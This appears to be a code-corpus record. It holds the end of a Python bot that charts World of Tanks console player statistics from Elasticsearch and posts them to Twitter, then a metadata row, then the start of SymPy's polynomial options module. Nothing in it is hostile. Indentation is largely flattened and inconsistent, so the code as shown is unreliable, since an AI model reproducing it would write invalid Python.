text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLERANGE_PNG)
del fig
def query_five_battles_a_day_minimum(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
response = es.search(index=config['battle index'], body=five_battles_a_day_query)
buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in response['aggregations']['4']['buckets']:
key = bucket['key_as_string'].split('T')[0]
buckets['xbox'][key] = 0
buckets['ps'][key] = 0
buckets['all'][key] = 0
for subbucket in bucket['3']['buckets']:
buckets[subbucket['key']][key] = subbucket['2']['buckets']['5.0-*']['doc_count']
buckets['all'][key] = buckets['xbox'][key] + buckets['ps'][key]
return buckets
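# Result above: platform -> OrderedDict of day (YYYY-MM-DD) -> number of
# accounts with at least five battles that day; 'all' is the xbox + ps sum.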
# Requested by Khorne Dog in the forums
def create_five_battles_minimum_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle("Number of accounts having played at least 5 battles")
ax1 = fig.add_subplot(111)
width = 0.25
keys = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in buckets['all'].keys()]
xkeys = [d - timedelta(hours=3) for d in keys]
pkeys = [d + timedelta(hours=3) for d in keys]
xbox_bars = ax1.bar(xkeys, buckets['xbox'].values(), width=width, color='g')
ps_bars = ax1.bar(pkeys, buckets['ps'].values(), width=width, color='b')
ax1.table(
cellText=[
list(buckets['xbox'].values()),
list(buckets['ps'].values()),
list(buckets['all'].values())],
rowLabels=['xbox', 'ps', 'all'],
colLabels=[d.strftime('%Y-%m-%d') for d in keys],
loc='bottom')
ax1.set_ylabel('Accounts')
ax1.set_xticks([])
ax1.legend((xbox_bars[0], ps_bars[0]), ('xbox', 'ps'))
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(FIVEADAY_PNG)
def query_long_term_data(config, filter_server_failures=True):
now = datetime.utcnow()
then = now - timedelta(days=config.get('long term', 90) + 1)
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players = es.search(index=config['battle index'], body=players_query)
battles = es.search(index=config['battle index'], body=battles_query)
players_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
battles_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
average_battles_per_day_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in players['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
players_buckets['xbox'][key] = 0
players_buckets['ps'][key] = 0
players_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
players_buckets[subbucket['key']][key] = subbucket['doc_count']
players_buckets['all'][key] = players_buckets['xbox'][key] + players_buckets['ps'][key]
for bucket in battles['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
battles_buckets['xbox'][key] = 0
battles_buckets['ps'][key] = 0
battles_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
battles_buckets[subbucket['key']][key] = subbucket['1']['value']
battles_buckets['all'][key] = battles_buckets['xbox'][key] + battles_buckets['ps'][key]
if filter_server_failures:
skip_next = False
for key, value in players_buckets['ps'].items():
# 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped
if value < 20000:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = True
elif skip_next:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = False
for key in players_buckets['all'].keys():
if players_buckets['xbox'][key] is None:
average_battles_per_day_buckets['all'][key] = None
average_battles_per_day_buckets['xbox'][key] = None
average_battles_per_day_buckets['ps'][key] = None
else:
average_battles_per_day_buckets['xbox'][key] = battles_buckets['xbox'][key] / players_buckets['xbox'][key]
average_battles_per_day_buckets['ps'][key] = battles_buckets['ps'][key] / players_buckets['ps'][key]
average_battles_per_day_buckets['all'][key] = (battles_buckets['xbox'][key] + battles_buckets['ps'][key]) / (players_buckets['xbox'][key] + players_buckets['ps'][key])
    # Drop the most recent date bucket from every series before returning;
    # 'last_key' makes explicit which entry is removed.
    last_key = list(players_buckets['all'].keys())[-1]
    del players_buckets['all'][last_key]
    del players_buckets['xbox'][last_key]
    del players_buckets['ps'][last_key]
    del battles_buckets['all'][last_key]
    del battles_buckets['xbox'][last_key]
    del battles_buckets['ps'][last_key]
    del average_battles_per_day_buckets['xbox'][last_key]
    del average_battles_per_day_buckets['ps'][last_key]
    del average_battles_per_day_buckets['all'][last_key]
return players_buckets, battles_buckets, average_battles_per_day_buckets
def create_long_term_charts(players_buckets, battles_buckets, average_battles_per_day_buckets, watermark_text='@WOTC_Tracker'):
dates = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in players_buckets['all'].keys()]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, players_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, players_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(PLAYERSLONG_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Total Battles Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, battles_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, battles_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(BATTLESLONG_PNG)
del fig
# Average PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, average_battles_per_day_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, average_battles_per_day_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(AVERAGELONG_PNG)
del fig
def upload_long_term_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
playerslong = api.media_upload(PLAYERSLONG_PNG)
battleslong = api.media_upload(BATTLESLONG_PNG)
averagelong = api.media_upload(AVERAGELONG_PNG)
api.update_status(
status='Long-term view of active accounts, with downtime and multi-day catchup errors omitted',
media_ids=[playerslong.media_id, battleslong.media_id, averagelong.media_id]
)
def upload_long_term_mode_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
modelong = api.media_upload(MODEBREAKDOWNLONG_PNG)
percentlong = api.media_upload(MODEBREAKDOWNPERCENTLONG_PNG)
api.update_status(
status='Long-term view of battles per mode',
media_ids=[modelong.media_id, percentlong.media_id]
)
def upload_activity_graphs_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(BATTLES_PNG)
players = api.media_upload(PLAYERS_PNG)
newplayers = api.media_upload(NEWPLAYERS_PNG)
averages = api.media_upload(AVERAGE_PNG)
api.update_status(
status=config['twitter']['message'],
media_ids=[players.media_id, battles.media_id, newplayers.media_id, averages.media_id]
)
def upload_account_age_graph_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
accountage = api.media_upload(ACCOUNTAGE_PNG)
api.update_status(
status='Breakdown of active accounts by age per platform on #worldoftanksconsole',
media_ids=[accountage.media_id]
)
def upload_accounts_by_battles_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battlerange = api.media_upload(BATTLERANGE_PNG)
api.update_status(
status='Breakdown of accounts by number of battles played on #worldoftanksconsole',
media_ids=[battlerange.media_id]
)
def upload_five_battles_minimum_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
fiveaday = api.media_upload(FIVEADAY_PNG)
api.update_status(
status='Filtering accounts per day with 5 battles minimum on #worldoftanksconsole',
media_ids=[fiveaday.media_id]
)
def share_unique_with_twitter(config, unique):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
status = 'Unique Active Accounts For {} Over Time\n{}'
formatting = '{} days: {}'
for key, values in unique.items():
api.update_status(
status=status.format(
key,
'\n'.join(map(lambda l: formatting.format(
config['unique'][values.index(l)], l), values))
)
)
def build_cw_tanks_list(config):
api = 'https://api-console.worldoftanks.com/wotx/encyclopedia/vehicles/'
params = {
'application_id': config['wg api key'],
'fields': 'era,tank_id'
}
data = get(api, params=params).json()['data']
return ' OR '.join(
list(
map(
lambda t: 'tank_id:{}'.format(t['tank_id']),
filter(lambda t: t['era'] != '', data.values())
)
)
)
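# The returned string is a query_string filter over Cold War tank IDs, e.g.
# 'tank_id:4481 OR tank_id:5137' (illustrative IDs only); __main__ splices it
# into cw_popular_tanks_query and negates it for the WW2 queries.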
def query_es_for_top_tanks(config, era):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
if era == 'ww2':
query = ww2_popular_tanks_query
elif era == 'cw':
query = cw_popular_tanks_query
# Setup query
query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
response = es.search(index=config['tank index'], body=query)
buckets = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for bucket in response['aggregations']['2']['buckets']:
for subbucket in bucket['4']['buckets']:
key = subbucket['key']
for tank in subbucket['3']['buckets']:
buckets[key][tank['key']] = int(tank['1']['value'])
return buckets
def query_for_tank_info(tanks):
url = 'https://wotconsole.ru/api/tankopedia/en/{}.json'
new_tanks = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for plat, t in tanks.items():
for tank, battles in t.items():
response = get(url.format(tank))
new_tanks[plat][response.json()['info']['user_string']] = battles
new_tanks['playstation'] = new_tanks['ps']
del new_tanks['ps']
return new_tanks
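# Result above: {'xbox': ..., 'playstation': ...} mapping tank display names
# (resolved via the wotconsole.ru tankopedia endpoint) to battle counts.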
def share_top_tanks(config, era, top, day):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
for platform, tanks in top.items():
status = "Most used {} tanks on {} for {}\n{}"
formatting = '{}: {} battles'
api.update_status(
status=status.format(
era,
platform.capitalize(),
day,
'\n'.join([formatting.format(tank, battles) for tank, battles in tanks.items()])
)
)
def query_es_for_mode_battles_difference(config, long_term=False):
now = datetime.utcnow()
then = now - timedelta(days=config['days'] if not long_term else config['long term'])
es = Elasticsearch(**config['elasticsearch'])
# Setup query
battles_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
total_battles_response = es.search(index=config['battle index'], body=battles_query)
cw_battles_response = es.search(index=config['tank index'], body=cw_popular_tanks_query)
dates = [b['key_as_string'].split('T')[0] for b in total_battles_response[
'aggregations']['2']['buckets']]
# Filter numbers
ww2_battles_xbox = OrderedDict()
ww2_battles_ps = OrderedDict()
cw_battles_xbox = OrderedDict()
cw_battles_ps = OrderedDict()
percent_cw_xbox = OrderedDict()
percent_cw_ps = OrderedDict()
for d in dates:
ww2_battles_xbox[d] = 0
ww2_battles_ps[d] = 0
cw_battles_xbox[d] = 0
cw_battles_ps[d] = 0
percent_cw_xbox[d] = None
percent_cw_ps[d] = None
for bucket in total_battles_response['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
ww2_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
ww2_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for bucket in cw_battles_response['aggregations']['2']['buckets']:
if not bucket['4']['buckets']:
continue
for subbucket in bucket['4']['buckets']:
if subbucket['key'] == 'xbox':
cw_battles_xbox[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
else:
cw_battles_ps[bucket['key_as_string'].split('T')[0]] = subbucket['1']['value']
for i in range(len(dates)):
percent_cw_xbox[dates[i]] = cw_battles_xbox[dates[i]] / ww2_battles_xbox[dates[i]]
percent_cw_ps[dates[i]] = cw_battles_ps[dates[i]] / ww2_battles_ps[dates[i]]
ww2_battles_xbox[dates[i]] = ww2_battles_xbox[dates[i]] - cw_battles_xbox[dates[i]]
ww2_battles_ps[dates[i]] = ww2_battles_ps[dates[i]] - cw_battles_ps[dates[i]]
return dates, list(ww2_battles_xbox.values()), list(ww2_battles_ps.values()), list(cw_battles_xbox.values()), list(cw_battles_ps.values()), list(percent_cw_xbox.values()), list(percent_cw_ps.values())
def create_mode_difference_graph(dates, ww2_battles_xbox, ww2_battles_ps, cw_battles_xbox, cw_battles_ps, percent_cw_xbox, percent_cw_ps, long_term=False, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Mode PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated breakdown of battles between CW and WW2, per platform' if not long_term else 'Estimated breakdown of battles between CW and WW2, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, ww2_battles_xbox, color='darkgreen', linewidth=2, label='WW2: Xbox')
ax1.plot(shifted_dates, cw_battles_xbox, color='lightgreen', linewidth=2, label='CW: Xbox')
ax1.plot(shifted_dates, ww2_battles_ps, color='darkblue', linewidth=2, label='WW2: Playstation')
ax1.plot(shifted_dates, cw_battles_ps, color='lightblue', linewidth=2, label='CW: Playstation')
ax1.set_ylim(bottom=0)
# for i in range(len(shifted_dates)):
# xbox_text = ax1.annotate(annotations_xbox[i], (shifted_dates[i], ww2_battles_xbox[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# ps_text = ax1.annotate(annotations_ps[i], (shifted_dates[i], ww2_battles_ps[i]), verticalalignment='bottom', size=12 if not long_term else 8)
# xbox_text.set_rotation(90)
# ps_text.set_rotation(90)
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWN_PNG if not long_term else MODEBREAKDOWNLONG_PNG)
del fig
# Mode Percent PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150) if not long_term else plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Estimated percentage of battles taking place in CW, per platform' if not long_term else 'Estimated percentage of battles taking place in CW, per platform (long term)')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.yaxis.set_major_formatter(mtick.PercentFormatter(1.0))
ax1.tick_params(axis='x', labelrotation=45)
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, percent_cw_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, percent_cw_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(MODEBREAKDOWNPERCENT_PNG if not long_term else MODEBREAKDOWNPERCENTLONG_PNG)
del fig
def upload_mode_breakdown_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(MODEBREAKDOWN_PNG)
percent = api.media_upload(MODEBREAKDOWNPERCENT_PNG)
api.update_status(
status="Estimated split between WW2 and CW battles",
media_ids=[battles.media_id, percent.media_id]
)
def get_universal_params(config):
params = dict()
watermark = config.get('watermark text', None)
if watermark:
params['watermark_text'] = watermark
return params
if __name__ == '__main__':
agp = ArgumentParser(
description='Bot for processing tracker data and uploading to Twitter')
agp.add_argument('config', help='Config file location')
agp.add_argument('-u', '--upload', help='Upload to twitter', action='store_true')
agp.add_argument('--activity-graphs', action='store_true')
agp.add_argument('--account-age', action='store_true')
agp.add_argument('--accounts-by-battles', action='store_true')
agp.add_argument('--five-battles-min', action='store_true')
agp.add_argument('--long-term', action='store_true')
agp.add_argument('--share-unique', action='store_true')
agp.add_argument('--top-cw-tanks', action='store_true')
agp.add_argument('--top-ww2-tanks', action='store_true')
agp.add_argument('--mode-breakdown', action='store_true')
args = agp.parse_args()
config = manage_config('read', args.config)
additional_params = get_universal_params(config)
now = datetime.utcnow()
if args.top_cw_tanks or args.top_ww2_tanks or args.mode_breakdown or args.long_term:
CW_TANKS = build_cw_tanks_list(config)
cw_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = CW_TANKS
ww2_popular_tanks_query['query']['bool']['must'][0]['query_string']['query'] = 'NOT (' + CW_TANKS + ')'
if args.activity_graphs:
try:
create_activity_graphs(*query_es_for_graphs(config), **additional_params)
if args.upload:
upload_activity_graphs_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.account_age:
try:
create_account_age_chart(query_es_for_active_accounts(config), **additional_params)
if args.upload:
upload_account_age_graph_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.accounts_by_battles:
try:
create_accounts_by_battles_chart(query_es_for_accounts_by_battles(config), **additional_params)
if args.upload:
upload_accounts_by_battles_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.five_battles_min:
try:
create_five_battles_minimum_chart(query_five_battles_a_day_minimum(config), **additional_params)
if args.upload:
upload_five_battles_minimum_chart_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
# Limit long-term views to beginning of month to review previous month's history
if args.long_term:
if now.day == 1:
try:
create_long_term_charts(*query_long_term_data(config, config.get('omit errors long term', True)), **additional_params)
create_mode_difference_graph(*query_es_for_mode_battles_difference(config, long_term=True), long_term=True, **additional_params)
if args.upload:
upload_long_term_charts(config)
upload_long_term_mode_charts(config)
except Exception as e:
# print(e)
traceback.print_exc()
if args.share_unique:
try:
share_unique_with_twitter(config, query_es_for_unique(config))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_cw_tanks:
try:
share_top_tanks(config, 'CW', query_for_tank_info(query_es_for_top_tanks(config, 'cw')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.top_ww2_tanks:
try:
share_top_tanks(config, 'WW2', query_for_tank_info(query_es_for_top_tanks(config, 'ww2')), (now - timedelta(days=1)).strftime('%Y-%m-%d'))
except Exception as e:
# print(e)
traceback.print_exc()
if args.mode_breakdown:
try:
create_mode_difference_graph(*query_es_for_mode_battles_difference(config), **additional_params)
if args.upload:
upload_mode_breakdown_to_twitter(config)
except Exception as e:
# print(e)
traceback.print_exc()
| 37.474413 | 204 | 0.531545 | [
"MIT"
] | kamakazikamikaze/wotc-bot-twitter | bot.py | 62,245 | Python |
"""Options manager for :class:`Poly` and public API functions. """
from __future__ import print_function, division
__all__ = ["Options"]
from sympy.core import S, Basic, sympify
from sympy.core.compatibility import string_types, with_metaclass
from sympy.utilities import numbered_symbols, topological_sort, public
from sympy.utilities.iterables import has_dups
from sympy.polys.polyerrors import GeneratorsError, OptionError, FlagError
import sympy.polys
import re
class Option(object):
"""Base class for all kinds of options. """
option = None
is_Flag = False
requires = []
excludes = []
after = []
before = []
@classmethod
def default(cls):
return None
@classmethod
def preprocess(cls, option):
return None
@classmethod
def postprocess(cls, options):
pass
class Flag(Option):
"""Base class for all kinds of flags. """
is_Flag = True
class BooleanOption(Option):
"""An option that must have a boolean value or equivalent assigned. """
@classmethod
def preprocess(cls, value):
if value in [True, False]:
return bool(value)
else:
raise OptionError("'%s' must have a boolean value assigned, got %s" % (cls.option, value))
class OptionType(type):
"""Base type for all options that does registers options. """
def __init__(cls, *args, **kwargs):
@property
def getter(self):
try:
return self[cls.option]
except KeyError:
return cls.default()
setattr(Options, cls.option, getter)
Options.__options__[cls.option] = cls
@public
class Options(dict):
"""
Options manager for polynomial manipulation module.
Examples
========
>>> from sympy.polys.polyoptions import Options
>>> from sympy.polys.polyoptions import build_options
>>> from sympy.abc import x, y, z
>>> Options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
>>> build_options((x, y, z), {'domain': 'ZZ'})
{'auto': False, 'domain': ZZ, 'gens': (x, y, z)}
**Options**
* Expand --- boolean option
* Gens --- option
* Wrt --- option
* Sort --- option
* Order --- option
* Field --- boolean option
* Greedy --- boolean option
* Domain --- option
* Split --- boolean option
* Gaussian --- boolean option
* Extension --- option
* Modulus --- option
* Symmetric --- boolean option
* Strict --- boolean option
**Flags**
* Auto --- boolean flag
* Frac --- boolean flag
* Formal --- boolean flag
* Polys --- boolean flag
* Include --- boolean flag
* All --- boolean flag
* Gen --- flag
"""
__order__ = None
__options__ = {}
def __init__(self, gens, args, flags=None, strict=False):
dict.__init__(self)
if gens and args.get('gens', ()):
raise OptionError(
"both '*gens' and keyword argument 'gens' supplied")
elif gens:
args = dict(args)
args['gens'] = gens
defaults = args.pop('defaults', {})
def preprocess_options(args):
for option, value in args.items():
try:
cls = self.__options__[option]
except KeyError:
raise OptionError("'%s' is not a valid option" % option)
if issubclass(cls, Flag):
if flags is None or option not in flags:
if strict:
raise OptionError("'%s' flag is not allowed in this context" % option)
if value is not None:
self[option] = cls.preprocess(value)
preprocess_options(args)
for key, value in dict(defaults).items():
if key in self:
del defaults[key]
else:
for option in self.keys():
cls = self.__options__[option]
if key in cls.excludes:
del defaults[key]
break
preprocess_options(defaults)
for option in self.keys():
cls = self.__options__[option]
for require_option in cls.requires:
if self.get(require_option) is None:
raise OptionError("'%s' option is only allowed together with '%s'" % (option, require_option))
for exclude_option in cls.excludes:
if self.get(exclude_option) is not None:
raise OptionError("'%s' option is not allowed together with '%s'" % (option, exclude_option))
for option in self.__order__:
self.__options__[option].postprocess(self)
@classmethod
def _init_dependencies_order(cls):
"""Resolve the order of options' processing. """
if cls.__order__ is None:
vertices, edges = [], set([])
for name, option in cls.__options__.items():
vertices.append(name)
for _name in option.after:
edges.add((_name, name))
for _name in option.before:
edges.add((name, _name))
try:
cls.__order__ = topological_sort((vertices, list(edges)))
except ValueError:
raise RuntimeError(
"cycle detected in sympy.polys options framework")
def clone(self, updates={}):
"""Clone ``self`` and update specified options. """
obj = dict.__new__(self.__class__)
for option, value in self.items():
obj[option] = value
for option, value in updates.items():
obj[option] = value
return obj
def __setattr__(self, attr, value):
if attr in self.__options__:
self[attr] = value
else:
super(Options, self).__setattr__(attr, value)
@property
def args(self):
args = {}
for option, value in self.items():
if value is not None and option != 'gens':
cls = self.__options__[option]
if not issubclass(cls, Flag):
args[option] = value
return args
@property
def options(self):
options = {}
for option, cls in self.__options__.items():
if not issubclass(cls, Flag):
options[option] = getattr(self, option)
return options
@property
def flags(self):
flags = {}
for option, cls in self.__options__.items():
if issubclass(cls, Flag):
flags[option] = getattr(self, option)
return flags
class Expand(with_metaclass(OptionType, BooleanOption)):
"""``expand`` option to polynomial manipulation functions. """
option = 'expand'
requires = []
excludes = []
@classmethod
def default(cls):
return True
class Gens(with_metaclass(OptionType, Option)):
"""``gens`` option to polynomial manipulation functions. """
option = 'gens'
requires = []
excludes = []
@classmethod
def default(cls):
return ()
@classmethod
def preprocess(cls, gens):
if isinstance(gens, Basic):
gens = (gens,)
elif len(gens) == 1 and hasattr(gens[0], '__iter__'):
gens = gens[0]
if gens == (None,):
gens = ()
elif has_dups(gens):
raise GeneratorsError("duplicated generators: %s" % str(gens))
elif any(gen.is_commutative is False for gen in gens):
raise GeneratorsError("non-commutative generators: %s" % str(gens))
return tuple(gens)
class Wrt(with_metaclass(OptionType, Option)):
"""``wrt`` option to polynomial manipulation functions. """
option = 'wrt'
requires = []
excludes = []
_re_split = re.compile(r"\s*,\s*|\s+")
@classmethod
def preprocess(cls, wrt):
if isinstance(wrt, Basic):
return [str(wrt)]
elif isinstance(wrt, str):
wrt = wrt.strip()
if wrt.endswith(','):
raise OptionError('Bad input: missing parameter.')
if not wrt:
return []
return [ gen for gen in cls._re_split.split(wrt) ]
elif hasattr(wrt, '__getitem__'):
return list(map(str, wrt))
else:
raise OptionError("invalid argument for 'wrt' option")
class Sort(with_metaclass(OptionType, Option)):
"""``sort`` option to polynomial manipulation functions. """
option = 'sort'
requires = []
excludes = []
@classmethod
def default(cls):
return []
@classmethod
def preprocess(cls, sort):
if isinstance(sort, str):
return [ gen.strip() for gen in sort.split('>') ]
elif hasattr(sort, '__getitem__'):
return list(map(str, sort))
else:
raise OptionError("invalid argument for 'sort' option")
class Order(with_metaclass(OptionType, Option)):
"""``order`` option to polynomial manipulation functions. """
option = 'order'
requires = []
excludes = []
@classmethod
def default(cls):
return sympy.polys.orderings.lex
@classmethod
def preprocess(cls, order):
return sympy.polys.orderings.monomial_key(order)
class Field(with_metaclass(OptionType, BooleanOption)):
"""``field`` option to polynomial manipulation functions. """
option = 'field'
requires = []
excludes = ['domain', 'split', 'gaussian']
class Greedy(with_metaclass(OptionType, BooleanOption)):
"""``greedy`` option to polynomial manipulation functions. """
option = 'greedy'
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Composite(with_metaclass(OptionType, BooleanOption)):
"""``composite`` option to polynomial manipulation functions. """
option = 'composite'
@classmethod
def default(cls):
return None
requires = []
excludes = ['domain', 'split', 'gaussian', 'extension', 'modulus', 'symmetric']
class Domain(with_metaclass(OptionType, Option)):
"""``domain`` option to polynomial manipulation functions. """
option = 'domain'
requires = []
